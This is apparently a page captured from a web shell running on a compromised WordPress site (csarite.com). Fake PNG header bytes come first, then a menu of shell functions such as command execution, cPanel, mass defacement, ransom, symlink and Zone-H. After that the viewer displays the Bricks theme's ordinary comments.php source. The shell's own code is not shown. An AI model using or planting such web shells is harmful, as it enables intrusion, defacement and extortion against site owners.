\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/csarite.com/public_html/wp-content/themes/bricks/includes/utilities/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/csarite.com/public_html/wp-content/themes/bricks/includes/utilities/comments.php |
<?php
/**
* Comments list
*
* @since 1.0
*/
function bricks_list_comments( $comment, $args, $depth ) {
$GLOBALS['comment'] = $comment; // phpcs:ignore
if ( $args['style'] === 'div' ) {
$tag = 'div';
$add_below = 'comment';
} else {
$tag = 'li';
$add_below = 'div-comment';
}
?>
<<?php echo esc_html( $tag ); ?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ); ?> id="comment-<?php comment_ID(); ?>">
<?php if ( $args['style'] !== 'div' ) { ?>
<div id="div-comment-<?php comment_ID(); ?>" class="comment-body">
<?php } ?>
<?php if ( $args['bricks_avatar'] == true ) { ?>
<div class="comment-avatar">
<?php
if ( $args['avatar_size'] != 0 ) {
echo get_avatar(
$comment,
$args['avatar_size'],
'',
'',
[ 'class' => 'css-filter' ]
);
}
?>
<?php
$commentator = get_comment();
if ( user_can( $commentator->user_id, 'manage_options' ) ) {
?>
<div class="administrator-badge" data-balloon="<?php esc_attr_e( 'Admin', 'bricks' ); ?>" data-balloon-pos="top">A</div>
<?php } ?>
</div>
<?php } ?>
<div class="comment-data">
<div class="comment-author vcard">
<?php
// NOTE: Undocumented (@since 1.10)
$comment_author_tag = esc_html( apply_filters( 'bricks/comments/author_tag', 'h5' ) );
echo "<$comment_author_tag class=\"fn\">" . get_comment_author_link() . "</$comment_author_tag>";
?>
<?php
if ( $comment->comment_approved == '0' ) {
$commenter = wp_get_current_commenter();
if ( $commenter['comment_author_email'] ) {
$moderation_note = esc_html__( 'Your comment is awaiting moderation.', 'bricks' );
} else {
$moderation_note = esc_html__( 'Your comment is awaiting moderation. This is a preview; your comment will be visible after it has been approved.', 'bricks' );
}
echo '<em class="comment-awaiting-moderation">' . $moderation_note . '</em>';
}
?>
<div class="comment-meta">
<?php
// translators: %s: Human time diff
$timestamp = sprintf( __( '%s ago', 'bricks' ), human_time_diff( get_comment_time( 'U' ), current_time( 'timestamp' ) ) );
// NOTE: Undocumented
$timestamp = apply_filters( 'bricks/comments/timestamp', $timestamp, $comment );
echo '<a href="' . get_comment_link() . '"><span>' . $timestamp . '</span></a>';
?>
<?php if ( comments_open() ) { ?>
<span class="reply">
<?php
comment_reply_link(
array_merge(
$args,
[
'add_below' => $add_below,
'depth' => $depth,
'max_depth' => $args['max_depth']
]
)
);
?>
</span>
<?php } ?>
</div>
</div>
<div class="comment-content">
<?php comment_text(); ?>
</div>
</div>
<?php if ( $args['style'] !== 'div' ) { ?>
</div>
<?php
}
}
/**
* Move comment form textarea to the bottom
*
* @since 1.0
*/
function bricks_comment_form_fields_order( $fields ) {
if ( isset( $fields['comment'] ) ) {
$comment_field = $fields['comment'];
unset( $fields['comment'] );
$fields['comment'] = $comment_field;
}
return $fields;
}
add_filter( 'comment_form_fields', 'bricks_comment_form_fields_order' );